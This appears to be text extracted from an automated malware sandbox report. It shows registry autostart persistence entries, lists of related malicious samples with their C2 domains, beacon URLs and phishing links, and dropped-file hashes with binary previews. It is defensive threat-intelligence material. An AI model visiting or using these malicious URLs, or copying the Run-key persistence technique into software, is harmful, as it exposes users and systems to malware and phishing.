                                                                                                                                                                                                                                15:39:40AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgo mjvsikbqngeunkjyurda.exe
                                                                                                                                                                                                                                15:39:48AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwql C:\Users\user\AppData\Local\Temp\fzicpocoiytgwqmyr.exe
                                                                                                                                                                                                                                15:39:56AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrc yrzsecpaticodwrc.exe .
                                                                                                                                                                                                                                15:40:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypyk C:\Users\user\AppData\Local\Temp\ojtoccrezqmarmjwql.exe .
                                                                                                                                                                                                                                15:40:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run tlskvseogunymey ojtoccrezqmarmjwql.exe
                                                                                                                                                                                                                                15:40:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgo C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exe
                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                35.164.78.200PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                • nqwjmb.biz/qqkxguyx
                                                                                                                                                                                                                                PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                • tnevuluw.biz/vjmakoegwejtsrok
                                                                                                                                                                                                                                nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                • tnevuluw.biz/gkelhjchsuditmme
                                                                                                                                                                                                                                tyRPPK48Mk.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                • tnevuluw.biz/ejbrogxxii
                                                                                                                                                                                                                                RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                                                                                                                                                • nqwjmb.biz/ut
                                                                                                                                                                                                                                TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                • tnevuluw.biz/hb
                                                                                                                                                                                                                                TTMGv2XOAd.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • rmhhhmswqh.org/imgs/krewa/nqxa.php?id=e66cavkj&s5=3159&lip=192.168.2.9&win=Unk
                                                                                                                                                                                                                                McbdvFaVqC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • rmhhhmswqh.org/imgs/krewa/nqxa.php?id=1542jglu&s5=3159&lip=192.168.2.7&win=Unk
                                                                                                                                                                                                                                TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exeGet hashmaliciousFormBook, LummaC StealerBrowse
                                                                                                                                                                                                                                • ijnmvqa.biz/odsoxhgwtfeg
                                                                                                                                                                                                                                7qBBKk0P4l.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • memberreceive.net/index.php
                                                                                                                                                                                                                                104.27.207.92https://files.fm/u/vtrxvgdh6wGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                  https://files.fm/u/jsq73ja9cpGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                    http://files.fm/u/stdpwqvw9sGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        jRvFQFBzhX.exeGet hashmaliciousSocelarsBrowse
                                                                                                                                                                                                                                          67MPsax8fd.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            lBOsC9VNlS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              uFvG6DlSUpNCq_0a0Y3vNrYQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                One.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  Five.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    bbc.map.fastly.netfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                    • 151.101.192.81
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 151.101.128.81
                                                                                                                                                                                                                                                    https://b9halom2.page.link/dmCnGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 151.101.64.81
                                                                                                                                                                                                                                                    4s14EZ9Cja.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 151.101.0.81
                                                                                                                                                                                                                                                    ONOiP4wkdZ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 151.101.0.81
                                                                                                                                                                                                                                                    https://utfgsds.ezua.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 151.101.0.81
                                                                                                                                                                                                                                                    https://boring-mendel.91-208-92-12.plesk.page/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 151.101.0.81
                                                                                                                                                                                                                                                    http://www.ofice.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 151.101.0.81
                                                                                                                                                                                                                                                    4oV2svIvyn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 151.101.0.81
                                                                                                                                                                                                                                                    https://staffbenefitaccess23.000webhostapp.com/1Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                    • 151.101.0.81
                                                                                                                                                                                                                                                    www.showmyipaddress.comvundevjtbot.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 188.114.97.7
                                                                                                                                                                                                                                                    E5DpWZ7Yhr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 188.114.96.7
                                                                                                                                                                                                                                                    ONOiP4wkdZ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 188.114.97.7
                                                                                                                                                                                                                                                    tLIQS3Pca5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                                    CgFJBVFNlg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    4oV2svIvyn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    Microsoft Office Project 2007.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    ymOOyTtHBV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.74.56
                                                                                                                                                                                                                                                    57poVaWCk4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.74.56
                                                                                                                                                                                                                                                    CdHqfJlg4h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 188.114.97.7
                                                                                                                                                                                                                                                    www.whatismyip.comhttp://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.27.206.92
                                                                                                                                                                                                                                                    3AysenL2d0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.89.158
                                                                                                                                                                                                                                                    document.htm .exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.89.158
                                                                                                                                                                                                                                                    vundevjtbot.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.67.189.152
                                                                                                                                                                                                                                                    E5DpWZ7Yhr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.67.189.152
                                                                                                                                                                                                                                                    ONOiP4wkdZ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.89.158
                                                                                                                                                                                                                                                    It1r6uq8s3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.67.189.152
                                                                                                                                                                                                                                                    tLIQS3Pca5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.89.158
                                                                                                                                                                                                                                                    CgFJBVFNlg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.89.158
                                                                                                                                                                                                                                                    4oV2svIvyn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.89.158
                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    AMAZON-02UShttps://exxonmobil.sharefile.com/f/fo6e97b0-e6c2-4cc8-bc19-f661cb3d33b1?a=be3726f064e11ddaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 76.223.1.166
                                                                                                                                                                                                                                                    RicevutaPagamento_115538206.datGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 18.239.36.12
                                                                                                                                                                                                                                                    https://landing-cs.mailcomms.io/73C4D162CAD9C4016A99EC5AF537DA57B4F5451828F0865A7DC8EA34ED2492F0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 52.210.42.145
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                    • 52.222.236.23
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                    • 52.222.236.48
                                                                                                                                                                                                                                                    MIgkej781f.exeGet hashmaliciousNanocoreBrowse
                                                                                                                                                                                                                                                    • 3.137.123.63
                                                                                                                                                                                                                                                    76BnBryvGP.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                                    • 3.141.204.47
                                                                                                                                                                                                                                                    xc.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                                    • 3.141.204.47
                                                                                                                                                                                                                                                    qz.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                                    • 3.16.105.95
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                    • 52.222.236.80
                                                                                                                                                                                                                                                    CLOUDFLARENETUShttps://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m-Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 162.159.134.42
                                                                                                                                                                                                                                                    https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 1.1.1.1
                                                                                                                                                                                                                                                    ordine.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.90.114
                                                                                                                                                                                                                                                    ordine.pdfGet hashmaliciousHtmlDropperBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    order.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                                    https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                                                    Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    ordine.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    LISTA DE COTIZACIONES.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                                    • 104.26.12.205
                                                                                                                                                                                                                                                    https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=janice.atkins@faa.govGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                    • 104.18.11.207
                                                                                                                                                                                                                                                    CLOUDFLARENETUShttps://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m-Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 162.159.134.42
                                                                                                                                                                                                                                                    https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 1.1.1.1
                                                                                                                                                                                                                                                    ordine.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.21.90.114
                                                                                                                                                                                                                                                    ordine.pdfGet hashmaliciousHtmlDropperBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    order.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                                    https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                                                    Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    ordine.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    LISTA DE COTIZACIONES.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                                    • 104.26.12.205
                                                                                                                                                                                                                                                    https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=janice.atkins@faa.govGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                    • 104.18.11.207
                                                                                                                                                                                                                                                    TE-ASTE-ASEGna.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                                                                    • 41.37.180.82
                                                                                                                                                                                                                                                    na.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                                                                    • 41.42.142.171
                                                                                                                                                                                                                                                    na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                                                                    • 197.43.31.85
                                                                                                                                                                                                                                                    na.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                                                                    • 197.38.240.105
                                                                                                                                                                                                                                                    na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                    • 154.186.189.224
                                                                                                                                                                                                                                                    na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                    • 41.233.16.107
                                                                                                                                                                                                                                                    na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                    • 41.36.124.90
                                                                                                                                                                                                                                                    na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                    • 163.121.253.38
                                                                                                                                                                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                    • 197.49.247.237
                                                                                                                                                                                                                                                    arm7.nn-20241014-0317.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                    • 154.190.196.44
                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):280
                                                                                                                                                                                                                                                    Entropy (8bit):7.1981851936674515
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:nZM19YseDprNGmbYRnGI1hTN/vY/uSLmV/xjLD0nUP9rW+dxORWiHEzn:nQ9Y9p0m8hG8tjS6VNv4UPcQORB4
                                                                                                                                                                                                                                                    MD5:CC544179F2D591106D6C8F14D6C1C8C0
                                                                                                                                                                                                                                                    SHA1:3A31D5C3C55DA337A32955423E0F333DF1A41929
                                                                                                                                                                                                                                                    SHA-256:168BFE37E3AC673FE9A996D4FF8507D92EA490A93D20A94E1D2D6C8636154777
                                                                                                                                                                                                                                                    SHA-512:2AEDE5D78DED0BFCFE96C54373A8DB2F556117A177CE9C112A665593E4B3C1391E8D71E2FABF573EE3A4A3DEBA25F014337BE5FE5EC88648C01164BEFF0A85DA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:...&.Y.x..z..e.h1..]T..~.-./.`6..I.a1..N.*.PB<L....]..H.].......*.......@....==9..m.X.P..&k.....0..8t...=.'...#.0...2..j.Z..u......p..H.V.......V.~jZJB..&....n.&z....C..(X..9..%.B..r.lW9.0.KR.|bz.l..w..=I..F.]..n....#.Ti.o.1....KB.&..0.b:..9...b.lom....K.r.v.d..
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4248
                                                                                                                                                                                                                                                    Entropy (8bit):7.957329251765754
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:ibhkgM8ipnEVl8a9ukWu2+/G16c5/2uRIu7F90spS:WkSipneOaRWu2uA6mhIS/pS
                                                                                                                                                                                                                                                    MD5:2547EB3C7FC4309E0E30F0BA91DD9F62
                                                                                                                                                                                                                                                    SHA1:9900F84F829199069CD3DBD212F2C0259B34891D
                                                                                                                                                                                                                                                    SHA-256:C4834842132574F264AB481610796343593B33DB17DD4AB23D327E23134CAC46
                                                                                                                                                                                                                                                    SHA-512:2F0E6A962C7027B9F25F6A74449F43BB47646F6AC0EECD67338B3379983E1D27DBEA618608DEE2B8AEAB44477F8F97DC05F0224319FD58381E4D10F3101BC6C9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:...H...'^.._....N....F....#`...H....e...[w.=./p....M.6..;lLx.@.....~.j.1.....$O....{..........I]..l...G.M.7a&34U..O.....^.....c....*j,x.. .v.[.....k]..bL......U9.-<...PC@...j............8E...R....2oY.b........d...A.t/DS..]#.|...B..P.^]...5....eW ...4...R.P..$..=w...Ex.U.@..w...K Q.4..!...k@....l..W....<.u'..X.58.Y}....{=.H./.......ou.i....o....X..4..._.U.}..O..4.....o.Z ..R....=wi.........gT...\.(.......i...*3?....H..i......MN.p..f..!.Z.u.R}lv...)1/.HS..pn.....pZ.8...?...4=(.0.l5Iu.D.iL*6a...CE....w......y. .C...:...X.Z........\....G....6.9|@..........g..S..x..T..C$k..s(.....;.........[.V/..%h.....s..Y8........5Y...>..@....u.wm.@.t..S.=..y}T...8....o.;(.D...._i.(.<..(a7..W04J.(..s.u..L...(...:.SX)..W..GH.M.`#..h.....t.u..^...0....d...%.Q..e....^!..(y.J.KF. .Y.....5]E.R.\...bLW.FH:..o...}.*q...O.....n[..)...S9|...b.(.P..........,3....v..H..a@M`b.!.p....#=.....#.Kv......0D........(.d?C{v..t*,S..U..+...u......c.g..,...Hy.S..uQ.y....'.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1040384
                                                                                                                                                                                                                                                    Entropy (8bit):4.612147157482853
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:wIXsL0tvrSVz1DnemeYbpsnEf78AoXh6KkiD0OofzA+/VygHUmDa1is0f:wIXsgtvm1De5YlOx6lzBH46Umu1q
                                                                                                                                                                                                                                                    MD5:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    SHA1:70EF5A50636AFAAA91FF0CB0DF77F7E2FE14B6B2
                                                                                                                                                                                                                                                    SHA-256:E0E9067BD90B97AF4C6BCDFEE36FAD24B4CF382BE9314D58532ACC0DB0C7B37B
                                                                                                                                                                                                                                                    SHA-512:E37804EA5CCFD67AC3960AF429C72929286A2FA730953F89FD64E113210870395524FA3873F45F31DAA579F22E06768BA7AA947D58DAED3C2B8907B754B15342
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 97%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c.lQ..?Q..?Q..?B..?P..?T..?x..?T..?]..?.!.?S..?...?R..?Q..?...?T..?R..?...?P..?T..?P..?RichQ..?........................PE..L....@ZI.................p...`.......A............@.........................................................................x...<.......................................................................H............................................text....m.......p.................. ..`.rdata..*........ ..................@..@.data...8).......0..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):280
                                                                                                                                                                                                                                                    Entropy (8bit):7.1981851936674515
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:nZM19YseDprNGmbYRnGI1hTN/vY/uSLmV/xjLD0nUP9rW+dxORWiHEzn:nQ9Y9p0m8hG8tjS6VNv4UPcQORB4
                                                                                                                                                                                                                                                    MD5:CC544179F2D591106D6C8F14D6C1C8C0
                                                                                                                                                                                                                                                    SHA1:3A31D5C3C55DA337A32955423E0F333DF1A41929
                                                                                                                                                                                                                                                    SHA-256:168BFE37E3AC673FE9A996D4FF8507D92EA490A93D20A94E1D2D6C8636154777
                                                                                                                                                                                                                                                    SHA-512:2AEDE5D78DED0BFCFE96C54373A8DB2F556117A177CE9C112A665593E4B3C1391E8D71E2FABF573EE3A4A3DEBA25F014337BE5FE5EC88648C01164BEFF0A85DA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:...&.Y.x..z..e.h1..]T..~.-./.`6..I.a1..N.*.PB<L....]..H.].......*.......@....==9..m.X.P..&k.....0..8t...=.'...#.0...2..j.Z..u......p..H.V.......V.~jZJB..&....n.&z....C..(X..9..%.B..r.lW9.0.KR.|bz.l..w..=I..F.]..n....#.Ti.o.1....KB.&..0.b:..9...b.lom....K.r.v.d..
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1040384
                                                                                                                                                                                                                                                    Entropy (8bit):4.612147157482853
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:wIXsL0tvrSVz1DnemeYbpsnEf78AoXh6KkiD0OofzA+/VygHUmDa1is0f:wIXsgtvm1De5YlOx6lzBH46Umu1q
                                                                                                                                                                                                                                                    MD5:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    SHA1:70EF5A50636AFAAA91FF0CB0DF77F7E2FE14B6B2
                                                                                                                                                                                                                                                    SHA-256:E0E9067BD90B97AF4C6BCDFEE36FAD24B4CF382BE9314D58532ACC0DB0C7B37B
                                                                                                                                                                                                                                                    SHA-512:E37804EA5CCFD67AC3960AF429C72929286A2FA730953F89FD64E113210870395524FA3873F45F31DAA579F22E06768BA7AA947D58DAED3C2B8907B754B15342
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 97%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c.lQ..?Q..?Q..?B..?P..?T..?x..?T..?]..?.!.?S..?...?R..?Q..?...?T..?R..?...?P..?T..?P..?RichQ..?........................PE..L....@ZI.................p...`.......A............@.........................................................................x...<.......................................................................H............................................text....m.......p.................. ..`.rdata..*........ ..................@..@.data...8).......0..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1040384
                                                                                                                                                                                                                                                    Entropy (8bit):4.612147157482853
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:wIXsL0tvrSVz1DnemeYbpsnEf78AoXh6KkiD0OofzA+/VygHUmDa1is0f:wIXsgtvm1De5YlOx6lzBH46Umu1q
                                                                                                                                                                                                                                                    MD5:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    SHA1:70EF5A50636AFAAA91FF0CB0DF77F7E2FE14B6B2
                                                                                                                                                                                                                                                    SHA-256:E0E9067BD90B97AF4C6BCDFEE36FAD24B4CF382BE9314D58532ACC0DB0C7B37B
                                                                                                                                                                                                                                                    SHA-512:E37804EA5CCFD67AC3960AF429C72929286A2FA730953F89FD64E113210870395524FA3873F45F31DAA579F22E06768BA7AA947D58DAED3C2B8907B754B15342
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 97%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c.lQ..?Q..?Q..?B..?P..?T..?x..?T..?]..?.!.?S..?...?R..?Q..?...?T..?R..?...?P..?T..?P..?RichQ..?........................PE..L....@ZI.................p...`.......A............@.........................................................................x...<.......................................................................H............................................text....m.......p.................. ..`.rdata..*........ ..................@..@.data...8).......0..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1040384
                                                                                                                                                                                                                                                    Entropy (8bit):4.612147157482853
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:wIXsL0tvrSVz1DnemeYbpsnEf78AoXh6KkiD0OofzA+/VygHUmDa1is0f:wIXsgtvm1De5YlOx6lzBH46Umu1q
                                                                                                                                                                                                                                                    MD5:2CDB760530EC92B79EE2BF80371CAC90
